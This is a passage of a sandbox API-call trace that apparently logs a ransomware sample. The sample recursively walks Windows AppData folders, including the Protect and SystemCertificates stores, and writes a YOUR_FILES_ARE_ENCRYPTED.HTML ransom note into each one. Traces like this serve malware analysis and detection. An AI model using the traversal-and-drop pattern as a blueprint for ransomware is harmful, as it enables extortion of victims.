pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0171.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-892523515-1518344882-2423736544-500\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0171.152] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, 
nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0171.155] CloseHandle (hObject=0x58c) returned 1 [0171.155] GetProcessHeap () returned 0x270000 [0171.156] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0171.156] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="S-1-5-21-892523515-1518344882-2423736544-500", cAlternateFileName="S-1-5-~1")) returned 0 [0171.156] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0171.156] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0171.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0171.157] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0171.159] CloseHandle (hObject=0x5fc) returned 1 [0171.159] GetProcessHeap () returned 0x270000 [0171.160] HeapFree (in: 
hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0171.161] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0171.161] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned 65 [0171.161] GetProcessHeap () returned 0x270000 [0171.161] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0171.161] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0171.161] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0171.161] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, 
ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0171.161] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.161] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="My", cAlternateFileName="")) returned 1 [0171.162] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned 68 [0171.162] GetProcessHeap () returned 0x270000 [0171.162] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0171.162] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0171.162] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", lpString2="\\*" | out: 
lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0171.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0171.162] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.162] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0171.162] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned 81 [0171.162] GetProcessHeap () returned 0x270000 [0171.162] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75aa008 [0171.162] lstrcpyW (in: lpString1=0x75aa008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0171.163] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0171.163] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0171.163] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.163] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.163] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0171.163] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0171.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5dc [0171.164] WriteFile (in: hFile=0x5dc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0171.167] CloseHandle (hObject=0x5dc) returned 1 [0171.167] GetProcessHeap () returned 0x270000 [0171.168] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0171.168] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, 
ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="CRLs", cAlternateFileName="")) returned 1 [0171.168] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned 73 [0171.168] GetProcessHeap () returned 0x270000 [0171.168] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75aa008 [0171.168] lstrcpyW (in: lpString1=0x75aa008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0171.168] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0171.168] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 
[0171.169] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.169] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.169] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0171.169] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0171.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5dc [0171.170] WriteFile (in: hFile=0x5dc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) 
returned 1 [0171.172] CloseHandle (hObject=0x5dc) returned 1 [0171.172] GetProcessHeap () returned 0x270000 [0171.173] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0171.173] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="CTLs", cAlternateFileName="")) returned 1 [0171.173] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned 73 [0171.173] GetProcessHeap () returned 0x270000 [0171.173] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75aa008 [0171.173] lstrcpyW (in: lpString1=0x75aa008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0171.173] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0171.174] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, 
ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0171.174] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.174] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.174] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0171.174] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0171.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\your_files_are_encrypted.html"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5dc [0171.175] WriteFile (in: hFile=0x5dc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0171.178] CloseHandle (hObject=0x5dc) returned 1 [0171.179] GetProcessHeap () returned 0x270000 [0171.180] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0171.180] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="CTLs", cAlternateFileName="")) returned 0 [0171.180] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0171.180] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0171.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0171.181] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: 
lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0171.184] CloseHandle (hObject=0x58c) returned 1 [0171.184] GetProcessHeap () returned 0x270000 [0171.185] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0171.185] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="My", cAlternateFileName="")) returned 0 [0171.186] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0171.186] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0171.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0171.187] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0171.190] CloseHandle (hObject=0x5fc) returned 1 [0171.191] GetProcessHeap () returned 0x270000 [0171.191] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0171.192] FindNextFileW (in: 
